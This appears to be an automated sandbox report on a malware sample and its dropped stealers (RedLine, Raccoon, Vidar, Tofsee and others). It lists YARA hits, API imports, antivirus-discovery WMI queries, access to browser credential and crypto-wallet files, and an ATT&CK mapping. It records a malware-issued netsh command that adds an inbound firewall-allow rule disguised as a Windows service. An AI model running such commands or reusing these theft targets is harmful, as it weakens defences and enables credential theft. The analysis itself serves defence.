Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\explorer.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\tijXCZsbGe.exe  Code function: 0_2_0041A069 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,TerminateJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,GetNamedPipeInfo,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexW,GetLastError,HeapFree,WriteConsoleOutputCharacterA,GetModuleHandleW,GetNumberOfConsoleInputEvents,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBA,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,WriteFile,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
Source: C:\Users\user\AppData\Local\Temp\DB31.exe  Code function: 16_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
Source: C:\Users\user\AppData\Local\Temp\DB31.exe  Code function: 16_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
Source: C:\Users\user\AppData\Local\Temp\E748.exe  Code function: 17_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Users\user\Desktop\tijXCZsbGe.exe  Code function: 0_2_0041A069 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,TerminateJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,GetNamedPipeInfo,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexW,GetLastError,HeapFree,WriteConsoleOutputCharacterA,GetModuleHandleW,GetNumberOfConsoleInputEvents,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBA,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,WriteFile,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings
Source: C:\Users\user\AppData\Local\Temp\E748.exe  Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Modifies the windows firewall
Source: C:\Users\user\AppData\Local\Temp\E748.exe  Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match  File source: 35.0.F65C.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match  File source: 18.2.F65C.exe.401f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 35.0.F65C.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match  File source: 35.0.F65C.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match  File source: 35.0.F65C.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match  File source: 35.0.F65C.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match  File source: 18.2.F65C.exe.401f910.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000028.00000003.877844771.0000000003842000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000028.00000002.878164581.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0000002C.00000002.948415885.00000000002E2000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0000002C.00000002.982145423.0000000006720000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000012.00000002.825741767.0000000003F01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0000002B.00000002.902114556.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0000002B.00000003.899275338.0000000003842000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000023.00000000.820336133.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000023.00000000.821341997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000023.00000000.819697566.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000023.00000000.820836278.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: dump.pcap, type: PCAP
Yara detected Amadeys stealer DLL
Source: Yara match  File source: 00000027.00000003.860574341.0000000000700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000029.00000002.953108316.0000000000650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000029.00000002.952932110.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000031.00000002.888629779.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000031.00000003.885087344.0000000000820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000027.00000002.873026509.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000031.00000002.890660521.00000000007E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000029.00000003.873886365.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000027.00000002.874367341.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match  File source: 10.0.rifsswe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.1.tijXCZsbGe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.tijXCZsbGe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 10.2.rifsswe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 10.0.rifsswe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.tijXCZsbGe.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 9.2.rifsswe.6315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 10.0.rifsswe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match  File source: 10.1.rifsswe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0000000A.00000002.767900095.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.719913794.0000000000591000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 0000000A.00000002.768056484.00000000022F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.719885078.0000000000570000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000005.00000000.708378047.0000000004DF1000.00000020.00020000.sdmp, type: MEMORY
Yara detected Amadey bot
Source: Yara match  File source: dump.pcap, type: PCAP
Source: Yara match  File source: 00000029.00000002.953737182.0000000000821000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000029.00000002.953617420.00000000007C3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000029.00000002.953715192.0000000000812000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match  File source: 38.2.5C89.exe.4d40e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 38.2.5C89.exe.4d40e50.4.unpack, type: UNPACKEDPE
Source: Yara match  File source: 38.3.5C89.exe.4de0000.3.unpack, type: UNPACKEDPE
Source: Yara match  File source: 38.2.5C89.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 38.3.5C89.exe.4de0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 38.2.5C89.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000026.00000003.868438969.0000000004DE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000032.00000002.920325973.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000026.00000002.1024945743.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000032.00000003.917559502.0000000004DF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000032.00000002.931172576.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000026.00000002.953575570.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: 5C89.exe PID: 5200, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match  File source: 00000010.00000002.780534031.0000000000712000.00000004.00000001.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match  File source: 34.2.svchost.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 32.2.gecrjwsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 17.2.E748.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 34.2.svchost.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 32.2.gecrjwsv.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 32.3.gecrjwsv.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 32.2.gecrjwsv.exe.580e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 17.2.E748.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 32.2.gecrjwsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 32.2.gecrjwsv.exe.5a0000.2.unpack, type: UNPACKEDPE
Source: Yara match  File source: 17.2.E748.exe.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 17.3.E748.exe.650000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000020.00000002.803587070.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000020.00000002.803962316.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000011.00000002.953428772.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000011.00000002.957118764.0000000000630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000022.00000002.949927934.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000020.00000003.801375609.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000020.00000002.803904384.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000011.00000003.783551055.0000000000650000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: E748.exe PID: 5476, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: gecrjwsv.exe PID: 2860, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: svchost.exe PID: 6732, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\5C89.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\AppData\Local\Temp\5C89.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\AppData\Local\Temp\5C89.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp  String found in binary or memory: electrum
Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp  String found in binary or memory: electroncash
Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp  String found in binary or memory: Jaxxa
Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp  String found in binary or memory: Exodus
Source: F65C.exe  String found in binary or memory: set_UseMachineKeyStore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\5C89.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\5C89.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\5C89.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: Yara match  File source: 00000010.00000002.780534031.0000000000712000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: 5C89.exe PID: 5200, type: MEMORYSTR

Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match  File source: 35.0.F65C.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match  File source: 18.2.F65C.exe.401f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 35.0.F65C.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match  File source: 35.0.F65C.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match  File source: 35.0.F65C.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match  File source: 35.0.F65C.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match  File source: 18.2.F65C.exe.401f910.1.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000028.00000003.877844771.0000000003842000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000028.00000002.878164581.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0000002C.00000002.948415885.00000000002E2000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0000002C.00000002.982145423.0000000006720000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000012.00000002.825741767.0000000003F01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0000002B.00000002.902114556.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 0000002B.00000003.899275338.0000000003842000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000023.00000000.820336133.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000023.00000000.821341997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000023.00000000.819697566.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000023.00000000.820836278.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: dump.pcap, type: PCAP
Yara detected SmokeLoader
Source: Yara match  File source: 10.0.rifsswe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.1.tijXCZsbGe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.tijXCZsbGe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 10.2.rifsswe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 10.0.rifsswe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0.2.tijXCZsbGe.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 9.2.rifsswe.6315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 10.0.rifsswe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match  File source: 10.1.rifsswe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 0000000A.00000002.767900095.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.719913794.0000000000591000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 0000000A.00000002.768056484.00000000022F1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.719885078.0000000000570000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000005.00000000.708378047.0000000004DF1000.00000020.00020000.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match  File source: 38.2.5C89.exe.4d40e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 38.2.5C89.exe.4d40e50.4.unpack, type: UNPACKEDPE
Source: Yara match  File source: 38.3.5C89.exe.4de0000.3.unpack, type: UNPACKEDPE
Source: Yara match  File source: 38.2.5C89.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 38.3.5C89.exe.4de0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 38.2.5C89.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000026.00000003.868438969.0000000004DE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000032.00000002.920325973.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: 00000026.00000002.1024945743.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000032.00000003.917559502.0000000004DF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000032.00000002.931172576.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match  File source: 00000026.00000002.953575570.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: 5C89.exe PID: 5200, type: MEMORYSTR
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000010.00000002.780534031.0000000000712000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 34.2.svchost.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E748.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 34.2.svchost.exe.5d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.3.gecrjwsv.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.580e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E748.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 32.2.gecrjwsv.exe.5a0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.E748.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.3.E748.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000020.00000002.803587070.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000002.803962316.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.953428772.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.957118764.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.949927934.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000003.801375609.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000002.803904384.0000000000580000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000003.783551055.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: E748.exe PID: 5476, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: gecrjwsv.exe PID: 2860, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6732, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exeCode function: 32_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

Mitre Att&ck Matrix

The matrix is listed per tactic column; trailing digits after a technique name are the matrix's signature-count superscripts, kept as extracted. Techniques without a count were not observed.

Initial Access: Valid Accounts 1; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain; Trusted Relationship

Execution: Windows Management Instrumentation 221; Native API 531; Exploitation for Client Execution 1; Command and Scripting Interpreter 3; Scheduled Task/Job 1; Service Execution 3; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell; Visual Basic; Python

Persistence: DLL Side-Loading 1; Valid Accounts 1; Windows Service 14; Scheduled Task/Job 1; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Hypervisor

Privilege Escalation: DLL Side-Loading 1; Valid Accounts 1; Access Token Manipulation 1; Windows Service 14; Process Injection 713; Scheduled Task/Job 1; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Process Injection

Defense Evasion: Disable or Modify Tools 211; Deobfuscate/Decode Files or Information 11; Obfuscated Files or Information 3; Software Packing 33; Timestomp 1; DLL Side-Loading 1; File Deletion 1; Masquerading 131; Valid Accounts 1; Modify Registry 1; Access Token Manipulation 1; Virtualization/Sandbox Evasion 441; Process Injection 713; Hidden Files and Directories 1

Credential Access: OS Credential Dumping 1; Input Capture 1; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture

Discovery: System Time Discovery 2; Account Discovery 1; File and Directory Discovery 3; System Information Discovery 439; Security Software Discovery 871; Process Discovery 12; Virtualization/Sandbox Evasion 441; Application Window Discovery 1; System Owner/User Discovery 1; Remote System Discovery 1; Permission Groups Discovery; Local Groups; Domain Groups; Cloud Groups

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM; Exploitation of Remote Services; Attack PC via USB Connection

Collection: Archive Collected Data 11; Data from Local System 3; Email Collection 1; Input Capture 1; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection; Local Email Collection

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB; Commonly Used Port; Standard Application Layer Protocol

